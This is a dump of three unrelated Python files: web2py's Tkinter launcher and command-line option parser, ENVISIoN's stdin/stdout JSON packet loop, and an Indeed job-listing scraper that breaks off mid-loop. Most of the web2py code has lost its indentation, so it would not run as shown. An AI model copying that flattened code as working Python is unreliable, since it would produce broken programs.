add_label(ProgramAuthor).pack()
add_label(ProgramVersion).pack()
root.update()
time.sleep(5)
dialog.destroy()
return
class web2pyDialog(object):
""" Main window dialog """
def __init__(self, root, options):
""" web2pyDialog constructor """
import Tkinter
import tkMessageBox
root.title('web2py server')
self.root = Tkinter.Toplevel(root)
self.options = options
self.scheduler_processes = {}
self.menu = Tkinter.Menu(self.root)
servermenu = Tkinter.Menu(self.menu, tearoff=0)
httplog = os.path.join(self.options.folder, 'httpserver.log')
iconphoto = os.path.join('extras','icons','web2py.gif')
if os.path.exists(iconphoto):
img = Tkinter.PhotoImage(file=iconphoto)
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Building the Menu
item = lambda: start_browser(httplog)
servermenu.add_command(label='View httpserver.log',
command=item)
servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
command=self.quit)
self.menu.add_cascade(label='Server', menu=servermenu)
self.pagesmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
#scheduler menu
self.schedmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
#start and register schedulers from options
self.update_schedulers(start=True)
helpmenu = Tkinter.Menu(self.menu, tearoff=0)
# Home Page
item = lambda: start_browser('http://www.web2py.com/')
helpmenu.add_command(label='Home Page',
command=item)
# About
item = lambda: tkMessageBox.showinfo('About web2py', ProgramInfo)
helpmenu.add_command(label='About',
command=item)
self.menu.add_cascade(label='Info', menu=helpmenu)
self.root.config(menu=self.menu)
if options.taskbar:
self.root.protocol('WM_DELETE_WINDOW',
lambda: self.quit(True))
else:
self.root.protocol('WM_DELETE_WINDOW', self.quit)
sticky = Tkinter.NW
# IP
Tkinter.Label(self.root,
text='Server IP:',
justify=Tkinter.LEFT).grid(row=0,
column=0,
sticky=sticky)
self.ips = {}
self.selected_ip = Tkinter.StringVar()
row = 0
ips = [('127.0.0.1', 'Local (IPv4)')] + \
([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
[(ip, 'Public') for ip in options.ips] + \
[('0.0.0.0', 'Public')]
for ip, legend in ips:
self.ips[ip] = Tkinter.Radiobutton(
self.root, text='%s (%s)' % (legend, ip),
variable=self.selected_ip, value=ip)
self.ips[ip].grid(row=row, column=1, sticky=sticky)
if row == 0:
self.ips[ip].select()
row += 1
shift = row
# Port
Tkinter.Label(self.root,
text='Server Port:',
justify=Tkinter.LEFT).grid(row=shift,
column=0,
sticky=sticky)
self.port_number = Tkinter.Entry(self.root)
self.port_number.insert(Tkinter.END, self.options.port)
self.port_number.grid(row=shift, column=1, sticky=sticky)
# Password
Tkinter.Label(self.root,
text='Choose Password:',
justify=Tkinter.LEFT).grid(row=shift + 1,
column=0,
sticky=sticky)
self.password = Tkinter.Entry(self.root, show='*')
self.password.bind('<Return>', lambda e: self.start())
self.password.focus_force()
self.password.grid(row=shift + 1, column=1, sticky=sticky)
# Prepare the canvas
self.canvas = Tkinter.Canvas(self.root,
width=300,
height=100,
bg='black')
self.canvas.grid(row=shift + 2, column=0, columnspan=2)
self.canvas.after(1000, self.update_canvas)
# Prepare the frame
frame = Tkinter.Frame(self.root)
frame.grid(row=shift + 3, column=0, columnspan=2)
# Start button
self.button_start = Tkinter.Button(frame,
text='start server',
command=self.start)
self.button_start.grid(row=0, column=0)
# Stop button
self.button_stop = Tkinter.Button(frame,
text='stop server',
command=self.stop)
self.button_stop.grid(row=0, column=1)
self.button_stop.configure(state='disabled')
if options.taskbar:
import gluon.contrib.taskbar_widget
self.tb = gluon.contrib.taskbar_widget.TaskBarIcon()
self.checkTaskBar()
if options.password != '<ask>':
self.password.insert(0, options.password)
self.start()
self.root.withdraw()
else:
self.tb = None
def update_schedulers(self, start=False):
apps = []
available_apps = [arq for arq in os.listdir('applications/')]
available_apps = [arq for arq in available_apps
if os.path.exists(
'applications/%s/models/scheduler.py' % arq)]
if start:
#the widget takes care of starting the scheduler
if self.options.scheduler and self.options.with_scheduler:
apps = [app.strip() for app
in self.options.scheduler.split(',')
if app in available_apps]
for app in apps:
self.try_start_scheduler(app)
#reset the menu
self.schedmenu.delete(0, len(available_apps))
for arq in available_apps:
if arq not in self.scheduler_processes:
item = lambda u = arq: self.try_start_scheduler(u)
self.schedmenu.add_command(label="start %s" % arq,
command=item)
if arq in self.scheduler_processes:
item = lambda u = arq: self.try_stop_scheduler(u)
self.schedmenu.add_command(label="stop %s" % arq,
command=item)
def start_schedulers(self, app):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
code = "from gluon import current;current._scheduler.loop()"
print 'starting scheduler from widget for "%s"...' % app
args = (app, True, True, None, False, code)
logging.getLogger().setLevel(self.options.debuglevel)
p = Process(target=run, args=args)
self.scheduler_processes[app] = p
self.update_schedulers()
print "Currently running %s scheduler processes" % (
len(self.scheduler_processes))
p.start()
print "Processes started"
def try_stop_scheduler(self, app):
if app in self.scheduler_processes:
p = self.scheduler_processes[app]
del self.scheduler_processes[app]
p.terminate()
p.join()
self.update_schedulers()
def try_start_scheduler(self, app):
if app not in self.scheduler_processes:
t = threading.Thread(target=self.start_schedulers, args=(app,))
t.start()
def checkTaskBar(self):
""" Check taskbar status """
if self.tb.status:
if self.tb.status[0] == self.tb.EnumStatus.QUIT:
self.quit()
elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE:
if self.root.state() == 'withdrawn':
self.root.deiconify()
else:
self.root.withdraw()
elif self.tb.status[0] == self.tb.EnumStatus.STOP:
self.stop()
elif self.tb.status[0] == self.tb.EnumStatus.START:
self.start()
elif self.tb.status[0] == self.tb.EnumStatus.RESTART:
self.stop()
self.start()
del self.tb.status[0]
self.root.after(1000, self.checkTaskBar)
def update(self, text):
""" Update app text """
try:
self.text.configure(state='normal')
self.text.insert('end', text)
self.text.configure(state='disabled')
except:
pass # this should only happen if the app is destroyed
def connect_pages(self):
""" Connect pages """
#reset the menu
available_apps = [arq for arq in os.listdir('applications/')
if os.path.exists(
'applications/%s/__init__.py' % arq)]
self.pagesmenu.delete(0, len(available_apps))
for arq in available_apps:
url = self.url + arq
self.pagesmenu.add_command(
label=url, command=lambda u=url: start_browser(u))
def quit(self, justHide=False):
""" Finish the program execution """
if justHide:
self.root.withdraw()
else:
try:
scheds = self.scheduler_processes.keys()
for t in scheds:
self.try_stop_scheduler(t)
except:
pass
try:
newcron.stopcron()
except:
pass
try:
self.server.stop()
except:
pass
try:
self.tb.Destroy()
except:
pass
self.root.destroy()
sys.exit(0)
def error(self, message):
""" Show error message """
import tkMessageBox
tkMessageBox.showerror('web2py start server', message)
def start(self):
""" Start web2py server """
password = self.password.get()
if not password:
self.error('no password, no web admin interface')
ip = self.selected_ip.get()
if not is_valid_ip_address(ip):
return self.error('invalid host ip address')
try:
port = int(self.port_number.get())
except:
return self.error('invalid port number')
# Check for non default value for ssl inputs
if (len(self.options.ssl_certificate) > 0 or
len(self.options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
self.url = get_url(ip, proto=proto, port=port)
self.connect_pages()
self.button_start.configure(state='disabled')
try:
options = self.options
req_queue_size = options.request_queue_size
self.server = main.HttpServer(
ip,
port,
password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=req_queue_size,
timeout=options.timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
thread.start_new_thread(self.server.start, ())
except Exception, e:
self.button_start.configure(state='normal')
return self.error(str(e))
if not self.server_ready():
self.button_start.configure(state='normal')
return
self.button_stop.configure(state='normal')
if not options.taskbar:
thread.start_new_thread(
start_browser, (get_url(ip, proto=proto, port=port), True))
self.password.configure(state='readonly')
[ip.configure(state='disabled') for ip in self.ips.values()]
self.port_number.configure(state='readonly')
if self.tb:
self.tb.SetServerRunning()
def server_ready(self):
for listener in self.server.server.listeners:
if listener.ready:
return True
return False
def stop(self):
""" Stop web2py server """
self.button_start.configure(state='normal')
self.button_stop.configure(state='disabled')
self.password.configure(state='normal')
[ip.configure(state='normal') for ip in self.ips.values()]
self.port_number.configure(state='normal')
self.server.stop()
if self.tb:
self.tb.SetServerStopped()
def update_canvas(self):
""" Update canvas """
try:
t1 = os.path.getsize('httpserver.log')
except:
self.canvas.after(1000, self.update_canvas)
return
try:
fp = open('httpserver.log', 'r')
fp.seek(self.t0)
data = fp.read(t1 - self.t0)
fp.close()
value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
self.p0 = value
for i in xrange(len(self.p0) - 1):
c = self.canvas.coords(self.q0[i])
self.canvas.coords(self.q0[i],
(c[0],
self.p0[i],
c[2],
self.p0[i + 1]))
self.t0 = t1
except BaseException:
# typically hit on the first call, when self.t0/self.p0/self.q0 do not exist yet
self.t0 = t1
self.p0 = [100] * 300
self.q0 = [self.canvas.create_line(i, 100, i + 1, 100,
fill='green') for i in xrange(len(self.p0) - 1)]
self.canvas.after(1000, self.update_canvas)
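# Sparkline note: each second the newest sample above is 10 + 90/sqrt(1 + new_log_lines),
# so an idle server draws near y=100 (canvas bottom) and a busy one climbs toward
# y=10 (canvas top).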
def console():
""" Defines the behavior of the console web2py execution """
import optparse
import textwrap
usage = "python web2py.py"
description = """\
web2py Web Framework startup script.
ATTENTION: unless a password is specified (-a 'passwd') web2py will
attempt to run a GUI. In this case command line options are ignored."""
description = textwrap.dedent(description)
parser = optparse.OptionParser(
usage, None, optparse.Option, ProgramVersion)
parser.description = description
msg = ('IP address of the server (e.g., 127.0.0.1 or ::1); '
'Note: This value is ignored when using the \'interfaces\' option.')
parser.add_option('-i',
'--ip',
default='127.0.0.1',
dest='ip',
help=msg)
parser.add_option('-p',
'--port',
default='8000',
dest='port',
type='int',
help='port of server (8000)')
msg = ('password to be used for administration '
'(use -a "<recycle>" to reuse the last password))')
parser.add_option('-a',
'--password',
default='<ask>',
dest='password',
help=msg)
parser.add_option('-c',
'--ssl_certificate',
default='',
dest='ssl_certificate',
help='file that contains ssl certificate')
parser.add_option('-k',
'--ssl_private_key',
default='',
dest='ssl_private_key',
help='file that contains ssl private key')
msg = ('Use this file containing the CA certificate to validate X509 '
'certificates from clients')
parser.add_option('--ca-cert',
action='store',
dest='ssl_ca_certificate',
default=None,
help=msg)
parser.add_option('-d',
'--pid_filename',
default='httpserver.pid',
dest='pid_filename',
help='file to store the pid of the server')
parser.add_option('-l',
'--log_filename',
default='httpserver.log',
dest='log_filename',
help='file to log connections')
parser.add_option('-n',
'--numthreads',
default=None,
type='int',
dest='numthreads',
help='number of threads (deprecated)')
parser.add_option('--minthreads',
default=None,
type='int',
dest='minthreads',
help='minimum number of server threads')
parser.add_option('--maxthreads',
default=None,
type='int',
dest='maxthreads',
help='maximum number of server threads')
parser.add_option('-s',
'--server_name',
default=socket.gethostname(),
dest='server_name',
help='server name for the web server')
msg = 'max number of queued requests when server unavailable'
parser.add_option('-q',
'--request_queue_size',
default='5',
type='int',
dest='request_queue_size',
help=msg)
parser.add_option('-o',
'--timeout',
default='10',
type='int',
dest='timeout',
help='timeout for individual request (10 seconds)')
parser.add_option('-z',
'--shutdown_timeout',
default='5',
type='int',
dest='shutdown_timeout',
help='timeout on shutdown of server (5 seconds)')
parser.add_option('--socket-timeout',
default=5,
type='int',
dest='socket_timeout',
help='timeout for socket (5 seconds)')
parser.add_option('-f',
'--folder',
default=os.getcwd(),
dest='folder',
help='folder from which to run web2py')
parser.add_option('-v',
'--verbose',
action='store_true',
dest='verbose',
default=False,
help='increase --test verbosity')
parser.add_option('-Q',
'--quiet',
action='store_true',
dest='quiet',
default=False,
help='disable all output')
msg = ('set debug output level (0-100, 0 means all, 100 means none; '
'default is 30)')
parser.add_option('-D',
'--debug',
dest='debuglevel',
default=30,
type='int',
help=msg)
msg = ('run web2py in interactive shell or IPython (if installed) with '
'specified appname (if app does not exist it will be created). '
'APPNAME like a/c/f (c,f optional)')
parser.add_option('-S',
'--shell',
dest='shell',
metavar='APPNAME',
help=msg)
msg = ('run web2py in interactive shell or bpython (if installed) with '
'specified appname (if app does not exist it will be created).\n'
'Use combined with --shell')
parser.add_option('-B',
'--bpython',
action='store_true',
default=False,
dest='bpython',
help=msg)
msg = 'only use plain python shell; should be used with --shell option'
parser.add_option('-P',
'--plain',
action='store_true',
default=False,
dest='plain',
help=msg)
msg = ('auto import model files; default is False; should be used '
'with --shell option')
parser.add_option('-M',
'--import_models',
action='store_true',
default=False,
dest='import_models',
help=msg)
msg = ('run PYTHON_FILE in web2py environment; '
'should be used with --shell option')
parser.add_option('-R',
'--run',
dest='run',
metavar='PYTHON_FILE',
default='',
help=msg)
msg = ('run scheduled tasks for the specified apps: expects a list of '
'app names as -K app1,app2,app3 '
'or a list of app:groups as -K app1:group1:group2,app2:group1 '
'to override specific group_names. (only strings, no spaces '
'allowed). Requires a scheduler to be defined in the models')
parser.add_option('-K',
'--scheduler',
dest='scheduler',
default=None,
help=msg)
msg = 'run schedulers alongside webserver, needs -K app1 and -a too'
parser.add_option('-X',
'--with-scheduler',
action='store_true',
default=False,
dest='with_scheduler',
help=msg)
msg = ('run doctests in web2py environment; '
'TEST_PATH like a/c/f (c,f optional)')
parser.add_option('-T',
'--test',
dest='test',
metavar='TEST_PATH',
default=None,
help=msg)
parser.add_option('-W',
'--winservice',
dest='winservice',
default='',
help='-W install|start|stop as Windows service')
msg = 'trigger a cron run manually; usually invoked from a system crontab'
parser.add_option('-C',
'--cron',
action='store_true',
dest='extcron',
default=False,
help=msg)
msg = 'triggers the use of softcron'
parser.add_option('--softcron',
action='store_true',
dest='softcron',
default=False,
help=msg)
parser.add_option('-Y',
'--run-cron',
action='store_true',
dest='runcron',
default=False,
help='start the background cron process')
parser.add_option('-J',
'--cronjob',
action='store_true',
dest='cronjob',
default=False,
help='identify cron-initiated command')
parser.add_option('-L',
'--config',
dest='config',
default='',
help='config file')
parser.add_option('-F',
'--profiler',
dest='profiler_dir',
default=None,
help='profiler dir')
parser.add_option('-t',
'--taskbar',
action='store_true',
dest='taskbar',
default=False,
help='use web2py gui and run in taskbar (system tray)')
parser.add_option('',
'--nogui',
action='store_true',
default=False,
dest='nogui',
help='text-only, no GUI')
    msg = ('should be followed by a list of arguments to be passed to the script; '
           'to be used with -S; -A must be the last option')
parser.add_option('-A',
'--args',
action='store',
dest='args',
default=None,
help=msg)
parser.add_option('--no-banner',
action='store_true',
default=False,
dest='nobanner',
help='Do not print header banner')
msg = ('listen on multiple addresses: '
'"ip1:port1:key1:cert1:ca_cert1;ip2:port2:key2:cert2:ca_cert2;..." '
'(:key:cert:ca_cert optional; no spaces; IPv6 addresses must be in '
'square [] brackets)')
parser.add_option('--interfaces',
action='store',
dest='interfaces',
default=None,
help=msg)
msg = 'runs web2py tests'
parser.add_option('--run_system_tests',
action='store_true',
dest='run_system_tests',
default=False,
help=msg)
    msg = ('adds coverage reporting (needs --run_system_tests, '
           'python 2.7 and the coverage module installed). '
           'You can alter the default path by setting the environment '
           'variable "COVERAGE_PROCESS_START". '
           'By default it takes gluon/tests/coverage.ini')
parser.add_option('--with_coverage',
action='store_true',
dest='with_coverage',
default=False,
help=msg)
if '-A' in sys.argv:
k = sys.argv.index('-A')
elif '--args' in sys.argv:
k = sys.argv.index('--args')
else:
k = len(sys.argv)
sys.argv, other_args = sys.argv[:k], sys.argv[k + 1:]
(options, args) = parser.parse_args()
options.args = [options.run] + other_args
global_settings.cmd_options = options
global_settings.cmd_args = args
try:
options.ips = list(set( # no duplicates
[addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
if not is_loopback_ip_address(addrinfo=addrinfo)]))
except socket.gaierror:
options.ips = []
if options.run_system_tests:
run_system_tests(options)
if options.quiet:
capture = cStringIO.StringIO()
sys.stdout = capture
logger.setLevel(logging.CRITICAL + 1)
else:
logger.setLevel(options.debuglevel)
if options.config[-3:] == '.py':
options.config = options.config[:-3]
if options.cronjob:
global_settings.cronjob = True # tell the world
options.plain = True # cronjobs use a plain shell
options.nobanner = True
options.nogui = True
options.folder = os.path.abspath(options.folder)
# accept --interfaces in the form
# "ip1:port1:key1:cert1:ca_cert1;[ip2]:port2;ip3:port3:key3:cert3"
# (no spaces; optional key:cert indicate SSL)
if isinstance(options.interfaces, str):
interfaces = options.interfaces.split(';')
options.interfaces = []
for interface in interfaces:
if interface.startswith('['): # IPv6
ip, if_remainder = interface.split(']', 1)
ip = ip[1:]
if_remainder = if_remainder[1:].split(':')
if_remainder[0] = int(if_remainder[0]) # numeric port
options.interfaces.append(tuple([ip] + if_remainder))
else: # IPv4
interface = interface.split(':')
interface[1] = int(interface[1]) # numeric port
options.interfaces.append(tuple(interface))
# accepts --scheduler in the form
# "app:group1,group2,app2:group1"
scheduler = []
options.scheduler_groups = None
if isinstance(options.scheduler, str):
if ':' in options.scheduler:
for opt in options.scheduler.split(','):
scheduler.append(opt.split(':'))
options.scheduler = ','.join([app[0] for app in scheduler])
options.scheduler_groups = scheduler
if options.numthreads is not None and options.minthreads is None:
options.minthreads = options.numthreads # legacy
create_welcome_w2p()
    if not options.cronjob:
        # create the applications package if it is missing
        if not os.path.exists('applications/__init__.py'):
            write_file('applications/__init__.py', '')
return (options, args)
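# Illustrative note (not part of the original source): given the
# "ip:port[:key:cert[:ca_cert]]" syntax documented above, a string such as
#
#   "127.0.0.1:8000;[::1]:8001;10.0.0.5:443:server.key:server.crt"
#
# is parsed by console() into
#
#   [('127.0.0.1', 8000),
#    ('::1', 8001),
#    ('10.0.0.5', 443, 'server.key', 'server.crt')]
#
# i.e. tuples of (ip, numeric port, optional SSL file names); the file names
# here are hypothetical.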
def check_existent_app(options, appname):
if os.path.isdir(os.path.join(options.folder, 'applications', appname)):
return True
def get_code_for_scheduler(app, options):
if len(app) == 1 or app[1] is None:
code = "from gluon import current;current._scheduler.loop()"
else:
code = "from gluon import current;current._scheduler.group_names = ['%s'];"
code += "current._scheduler.loop()"
code = code % ("','".join(app[1:]))
app_ = app[0]
if not check_existent_app(options, app_):
print "Application '%s' doesn't exist, skipping" % (app_)
return None, None
return app_, code
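# Illustrative note (not part of the original source): for a hypothetical
# app entry ['myapp', 'g1', 'g2'], get_code_for_scheduler() returns
#
#   ('myapp',
#    "from gluon import current;current._scheduler.group_names = ['g1','g2'];"
#    "current._scheduler.loop()")
#
# i.e. the code string that run() later executes inside the app's environment.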
def start_schedulers(options):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
processes = []
apps = [(app.strip(), None) for app in options.scheduler.split(',')]
if options.scheduler_groups:
apps = options.scheduler_groups
code = "from gluon import current;current._scheduler.loop()"
logging.getLogger().setLevel(options.debuglevel)
if len(apps) == 1 and not options.with_scheduler:
app_, code = get_code_for_scheduler(apps[0], options)
if not app_:
return
print 'starting single-scheduler for "%s"...' % app_
run(app_, True, True, None, False, code)
return
for app in apps:
app_, code = get_code_for_scheduler(app, options)
if not app_:
continue
print 'starting scheduler for "%s"...' % app_
args = (app_, True, True, None, False, code)
p = Process(target=run, args=args)
processes.append(p)
print "Currently running %s scheduler processes" % (len(processes))
p.start()
        # stagger start-up to avoid hitting the db at the same time
time.sleep(0.7)
print "Processes started"
for p in processes:
try:
p.join()
except (KeyboardInterrupt, SystemExit):
print "Processes stopped"
except:
p.terminate()
p.join()
def start(cron=True):
""" Start server """
# ## get command line arguments
(options, args) = console()
if not options.nobanner:
print ProgramName
print ProgramAuthor
print ProgramVersion
from dal import DRIVERS
if not options.nobanner:
print 'Database drivers available: %s' % ', '.join(DRIVERS)
# ## if -L load options from options.config file
if options.config:
try:
options2 = __import__(options.config, {}, {}, '')
except Exception:
try:
# Jython doesn't like the extra stuff
options2 = __import__(options.config)
except Exception:
print 'Cannot import config file [%s]' % options.config
sys.exit(1)
for key in dir(options2):
if hasattr(options, key):
setattr(options, key, getattr(options2, key))
    logfile0 = os.path.join('extras', 'examples', 'logging.example.conf')
    if not os.path.exists('logging.conf') and os.path.exists(logfile0):
        import shutil
        sys.stdout.write("Copying logging.example.conf to logging.conf ... ")
        shutil.copyfile(logfile0, 'logging.conf')
        sys.stdout.write("OK\n")
# ## if -T run doctests (no cron)
if hasattr(options, 'test') and options.test:
test(options.test, verbose=options.verbose)
return
# ## if -S start interactive shell (also no cron)
if options.shell:
        if options.args is not None:
sys.argv[:] = options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cronjob=options.cronjob)
return
# ## if -C start cron run (extcron) and exit
# ## -K specifies optional apps list (overloading scheduler)
if options.extcron:
logger.debug('Starting extcron...')
global_settings.web2py_crontype = 'external'
if options.scheduler: # -K
apps = [app.strip() for app in options.scheduler.split(
',') if check_existent_app(options, app.strip())]
else:
apps = None
extcron = newcron.extcron(options.folder, apps=apps)
extcron.start()
extcron.join()
return
# ## if -K
if options.scheduler and not options.with_scheduler:
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
# ## if -W install/start/stop web2py as service
if options.winservice:
if os.name == 'nt':
try:
from winservice import register_service_handler, Web2pyService
register_service_handler(
argv=['', options.winservice],
opt_file=options.config,
cls=Web2pyService)
except ImportError:
print 'Error: Missing python module winservice'
sys.exit(1)
else:
print 'Error: Windows services not supported on this platform'
sys.exit(1)
return
# ## if -H cron is enabled in this *process*
# ## if --softcron use softcron
# ## use hardcron in all other cases
if cron and options.runcron and options.softcron:
print 'Using softcron (but this is not very efficient)'
global_settings.web2py_crontype = 'soft'
elif cron and options.runcron:
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder).start()
# ## if no password provided and havetk start Tk interface
# ## or start interface if we want to put in taskbar (system tray)
    options.taskbar = getattr(options, 'taskbar', False)
if options.taskbar and os.name != 'nt':
print 'Error: taskbar not supported on this platform'
sys.exit(1)
root = None
if not options.nogui:
try:
import Tkinter
havetk = True
except ImportError:
logger.warn(
'GUI not available because Tk library is not installed')
havetk = False
options.nogui = True
        if (options.password == '<ask>' and havetk) or (options.taskbar and havetk):
try:
root = Tkinter.Tk()
except:
pass
if root:
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
if not options.quiet:
presentation(root)
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
# ## if no tk and no password, ask for a password
if not root and options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.nobanner:
print 'no password, no admin interface'
    # ## -X (if no tk, the widget takes care of it itself)
if not root and options.scheduler and options.with_scheduler:
t = threading.Thread(target=start_schedulers, args=(options,))
t.start()
# ## start server
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
(ip, port) = (options.ip, int(options.port))
else:
first_if = options.interfaces[0]
(ip, port) = first_if[0], first_if[1]
# Check for non default value for ssl inputs
if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.nobanner:
print 'please visit:'
print '\t', url
print 'use "kill -SIGTERM %i" to shutdown the web2py server' % os.getpid()
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
try:
t.join()
except:
pass
logging.shutdown()
|
nodeInterface.py
|
# ENVISIoN
#
# Copyright (c) 2019 Jesper Ericsson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##############################################################################################
import sys, os, inspect
import time
import select
import json
path_to_current_folder = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
sys.path.append(path_to_current_folder + "/../")
from envisionpy.EnvisionMain import EnvisionMain
from envisionpy.utils.exceptions import *
import threading
import queue
def send_packet(tag, data):
    # Package data into a JSON-string packet and send it by printing to stdout.
    packet = json.dumps({"tag": tag, "data": data})
    print(packet)
    sys.stdout.flush()
def decode_packet(packet):
# Return python dictionary based on JSON-string-packet
obj = json.loads(packet)
return obj
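# A minimal illustration (not part of the original file) of the stdin/stdout
# packet protocol implemented by the two helpers above:
#
#   send_packet('status', ['ready'])
#   # writes the line: {"tag": "status", "data": ["ready"]}
#
#   decode_packet('{"tag": "pong", "data": null}')
#   # returns: {'tag': 'pong', 'data': None}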
def input_loop(input_queue):
while True:
input_queue.put(sys.stdin.readline())
def main():
input_queue = queue.Queue()
input_thread = threading.Thread(target=input_loop, args=(input_queue,))
input_thread.daemon = True
input_thread.start()
while True:
time_start = time.time()
while not input_queue.empty():
# send_packet("Debug", "Packet recieved")
packet = decode_packet(input_queue.get())
if packet['tag'] == 'request':
try:
response = envisionMain.handle_request(packet['data'])
send_packet('response', response)
                except EnvisionError as e:  # non-critical error; ENVISIoN should still function
send_packet('error', [packet['data'], format_error(e)])
# except Exception as e:
# send_packet('error', [packet['data'], format_error(e)])
elif packet['tag'] == 'ping':
send_packet('pong', packet['data'])
else:
print('Unhandled packet: ', packet)
envisionMain.update()
# Try to loop at 60 fps
time_elapsed = time.time() - time_start
time.sleep(max([1.0/60.0 - time_elapsed, 0]))
# Initialize ENVISIoN
send_packet("status", ["Initializing envision"])
envisionMain = EnvisionMain()
send_packet("status", ["envision started"])
# envisionMain.update()
# print(envisionMain.handle_request({'type': 'init_manager', 'data': ['C:/Kandidatprojekt/ENVISIoN-2020/nacl100.hdf5']}))
# envisionMain.update()
# print(envisionMain.handle_request({'type': 'start_visualisation', 'data': ['nacl100', 'charge']}))
# envisionMain.update()
# envisionMain.update()
# while True:
# time_start = time.time()
# envisionMain.update()
# # Try to loop at 60 fps
# time_elapsed = time.time() - time_start
# time.sleep(max([1.0/60.0 - time_elapsed, 0]))
main()
|
services.py
|
import requests
import copy
from .models import JobCardModel, JobMetricsModel, HttpHeadersModel, JobDataModel
from bs4 import BeautifulSoup
from threading import Thread
# Write your model services here.
class JobCardService:
''' Handles the retrieval and storage of JobCardModel objects. '''
# Global variables.
card_id = 0
max_results = 0
success_count = 0
failure_count = 0
cards = []
http_headers = HttpHeadersModel.headers
user_agents = HttpHeadersModel.user_agents
user_agents_count = len(user_agents) - 1
url: str
    def __init__(self, position: str = '', *args):
        ''' Constructor; optionally takes a job position and a location. '''
        if not position:
            self.url = ''
            return
        pos = position.replace(' ', '+')
        if len(args) == 0:
            self.url = self.get_url(pos)
        else:
            location = args[0].replace(' ', '+')
            self.url = self.get_url(pos, location)
def parse_page_results(self) -> None:
''' Makes a GET request to Indeed based on defined url, parses results page. '''
headers = copy.deepcopy(self.http_headers)
headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36' #self.user_agents[random.randint(0, self.user_agents_count)]
        response = requests.get(self.url, headers=headers)
        soup = BeautifulSoup(response.text, 'html.parser') if response.status_code == 200 else None
        if soup is None:
            print(f'Error: GET request to Indeed using {response.url} returned status code {response.status_code}.')
            return
        raw_cards = soup.select('a.tapItem.fs-unmask.result')
        if not raw_cards:  # select() returns a list, never None
            print(f'Error: no job cards found.\nCheck the url: {response.url}')
            return
# Perform field extraction for an entire collection of 'raw cards'.
print(f'Parsing results 1 - 15: url = {response.url}')
parsed_cards = self.parse_card_details(cards = [self.get_card(raw_card) for raw_card in raw_cards])
self.cards.extend(parsed_cards)
# Iterate through the pagination to collect all cards from the search query.
for count in range(15, self.max_results, 15):
try:
url = 'https://www.indeed.com' + soup.find('a', {'aria-label': 'Next'}).get('href')
